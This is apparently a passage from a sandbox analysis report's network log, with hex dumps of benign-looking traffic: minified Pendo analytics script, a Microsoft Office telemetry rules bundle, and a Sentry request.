                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 2b 28 6e 5e 69 5e 72 29 2b 6f 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 5d 3c 3c 30 29 3c 3c 35 7c 6f 3e 3e 3e 32 37 29 2b 28 74 5e 28 6e 3d 6e 3c 3c 33 30 7c 6e 3e 3e 3e 32 29 5e 69 29 2b 72 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 31 5d 3c 3c 30 29 3c 3c 35 7c 72 3e 3e 3e 32 37 29 2b 28 6f 5e 28 74 3d 74 3c 3c 33 30 7c 74 3e 3e 3e 32 29 5e 6e 29 2b 69 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 32 5d 3c 3c 30 29 3c 3c 35 7c 69 3e 3e 3e 32 37 29 2b 28 72 5e 28 6f 3d 6f 3c 3c 33 30 7c 6f 3e 3e 3e 32 29 5e 74 29 2b 6e 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 33 5d 3c 3c 30 29 3c 3c 35 7c 6e 3e 3e 3e 32 37 29 2b 28 69 5e 28 72 3d 72 3c 3c 33 30 7c 72 3e 3e 3e 32 29 5e 6f 29 2b 74 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 34 5d 3c
                                                                                                                                                                                                                                                                                Data Ascii: +(n^i^r)+o+1859775393+a[s]<<0)<<5|o>>>27)+(t^(n=n<<30|n>>>2)^i)+r+1859775393+a[s+1]<<0)<<5|r>>>27)+(o^(t=t<<30|t>>>2)^n)+i+1859775393+a[s+2]<<0)<<5|i>>>27)+(r^(o=o<<30|o>>>2)^t)+n+1859775393+a[s+3]<<0)<<5|n>>>27)+(i^(r=r<<30|r>>>2)^o)+t+1859775393+a[s+4]<
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 2b 6f 5b 6e 3e 3e 31 32 26 31 35 5d 2b 6f 5b 6e 3e 3e 38 26 31 35 5d 2b 6f 5b 6e 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 6e 5d 2b 6f 5b 69 3e 3e 32 38 26 31 35 5d 2b 6f 5b 69 3e 3e 32 34 26 31 35 5d 2b 6f 5b 69 3e 3e 32 30 26 31 35 5d 2b 6f 5b 69 3e 3e 31 36 26 31 35 5d 2b 6f 5b 69 3e 3e 31 32 26 31 35 5d 2b 6f 5b 69 3e 3e 38 26 31 35 5d 2b 6f 5b 69 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 69 5d 2b 6f 5b 72 3e 3e 32 38 26 31 35 5d 2b 6f 5b 72 3e 3e 32 34 26 31 35 5d 2b 6f 5b 72 3e 3e 32 30 26 31 35 5d 2b 6f 5b 72 3e 3e 31 36 26 31 35 5d 2b 6f 5b 72 3e 3e 31 32 26 31 35 5d 2b 6f 5b 72 3e 3e 38 26 31 35 5d 2b 6f 5b 72 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 72 5d 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 6c 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                                Data Ascii: +o[n>>12&15]+o[n>>8&15]+o[n>>4&15]+o[15&n]+o[i>>28&15]+o[i>>24&15]+o[i>>20&15]+o[i>>16&15]+o[i>>12&15]+o[i>>8&15]+o[i>>4&15]+o[15&i]+o[r>>28&15]+o[r>>24&15]+o[r>>20&15]+o[r>>16&15]+o[r>>12&15]+o[r>>8&15]+o[r>>4&15]+o[15&r]},l.prototype.toString=l.prototyp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 6e 20 44 28 65 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 21 4d 28 65 29 26 26 7a 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 50 28 65 29 26 26 74 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 66 6f 72 28 76 61 72 20 74 3d 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 5b 5c 77 5c 2d 2e 5d 2a 63 64 6e 5b 5c 77 5c 2d 2e 5d 2a 5c 2e 28 70 65 6e 64 6f 2d 64 65 76 5c 2e 63 6f 6d 7c 70 65 6e 64 6f 5c 2e 69 6f 29 5c 2f 61 67 65 6e 74 5c 2f 73 74 61 74 69 63 5c 2f 28 5b 5c 77 5d 7b 38 7d 2d 5b 5c 77 5d 7b 34 7d 2d 5b 5c 77 5d 7b 34 7d 2d 5b 5c 77 5d 7b 34 7d 2d 5b 5c 77 5d 7b 31 32 7d 7c 50 45 4e 44 4f 5f 41 50 49 5f 4b 45 59 29 5c 2f 70 65 6e 64 6f 5c 2e 6a 73
                                                                                                                                                                                                                                                                                Data Ascii: n D(e){return!F(e)&&!M(e)&&z(e)}function G(e,t){return!F(e)&&P(e)&&t}function U(e){void 0===e&&(e=[]);for(var t=/^https:\/\/[\w\-.]*cdn[\w\-.]*\.(pendo-dev\.com|pendo\.io)\/agent\/static\/([\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12}|PENDO_API_KEY)\/pendo\.js
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 6e 20 75 65 28 65 2c 74 2c 6e 29 7b 69 66 28 47 28 65 2c 6e 29 29 7b 65 3d 42 28 65 2c 21 31 2c 6e 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 56 28 74 29 2c 63 65 28 65 2c 74 29 2c 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 73 65 28 65 2c 74 2c 6e 29 7c 7c 75 65 28 65 2c 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6a 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c 74 3d 28 6e 5b 22 61 73 79 6e 63 22 5d 3d 21 30 2c 6e 2e 73 72 63 3d 78 65 28 74 29 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 65 29 2c 6a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: n ue(e,t,n){if(G(e,n)){e=B(e,!1,n);if(e)return V(t),ce(e,t),!0}return!1}function de(e,t,n){return se(e,t,n)||ue(e,t,n)}function ce(e,t){var n=jb.createElement("script"),t=(n["async"]=!0,n.src=xe(t).createScriptURL(e),jb.getElementsByTagName("script")[0]);
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 5d 2c 56 3d 4d 61 74 68 2e 70 6f 77 28 32 2c 35 33 29 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 63 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 6e 75 6c 6c 3d 3d 6f 3f 72 2e 6c 65 6e 67 74 68 2d 31 3a 2b 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 6f 2c 30 29 2c 74 3d 41 72 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 2b 6f 5d 3b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 5b 30 5d
                                                                                                                                                                                                                                                                                Data Ascii: toLocaleString"],V=Math.pow(2,53)-1;function c(r,o){return o=null==o?r.length-1:+o,function(){for(var e=Math.max(arguments.length-o,0),t=Array(e),n=0;n<e;n++)t[n]=arguments[n+o];switch(o){case 0:return r.call(this,t);case 1:return r.call(this,arguments[0]
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 3d 74 79 70 65 6f 66 20 65 26 26 30 3c 3d 65 26 26 65 3c 3d 56 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 5b 74 5d 7d 7d 76 61 72 20 6d 3d 63 65 28 22 62 79 74 65 4c 65 6e 67 74 68 22 29 2c 6c 65 3d 64 65 28 6d 29 2c 66 65 3d 2f 5c 5b 6f 62 6a 65 63 74 20 28 28 49 7c 55 69 29 6e 74 28 38 7c 31 36 7c 33 32 29 7c 46 6c 6f 61 74 28 33 32 7c 36 34 29 7c 55 69 6e 74 38 43 6c 61 6d 70 65 64 7c 42 69 67 28 49 7c 55 69 29 6e 74 36 34 29 41 72 72 61 79 5c 5d 2f 3b 76 61 72 20 70 65 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6a 3f 6a 28 65 29 26 26 21 70 28 65 29 3a 6c 65 28 65 29 26 26 66 65 2e 74 65 73 74 28
                                                                                                                                                                                                                                                                                Data Ascii: =typeof e&&0<=e&&e<=V}}function ce(t){return function(e){return null==e?void 0:e[t]}}var m=ce("byteLength"),le=de(m),fe=/\[object ((I|Ui)nt(8|16|32)|Float(32|64)|Uint8Clamped|Big(I|Ui)nt64)Array\]/;var pe=t?function(e){return j?j(e)&&!p(e):le(e)&&fe.test(


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                29192.168.2.64975113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 09 Oct 2024 03:56:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DCE8165B436280"
                                                                                                                                                                                                                                                                                x-ms-request-id: b415ce4c-a01e-0053-0c33-1a8603000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180512Z-185b7d577bdchm66cr3227wnbw00000000ug00000000u5w5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                                                                                                                                                                                                                                Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                                                                                                                                                                                                                                Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                                                                                                                                                                                                                                Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                                                                                                                                                                                                                                Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                30192.168.2.64975434.120.195.2494432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC486OUTGET /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1
                                                                                                                                                                                                                                                                                Host: o49063.ingest.sentry.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC518INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:12 GMT
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                allow: POST
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                31192.168.2.64975318.173.205.424432612C:\Program Files\Google\Chrome\Application\chrome.exe
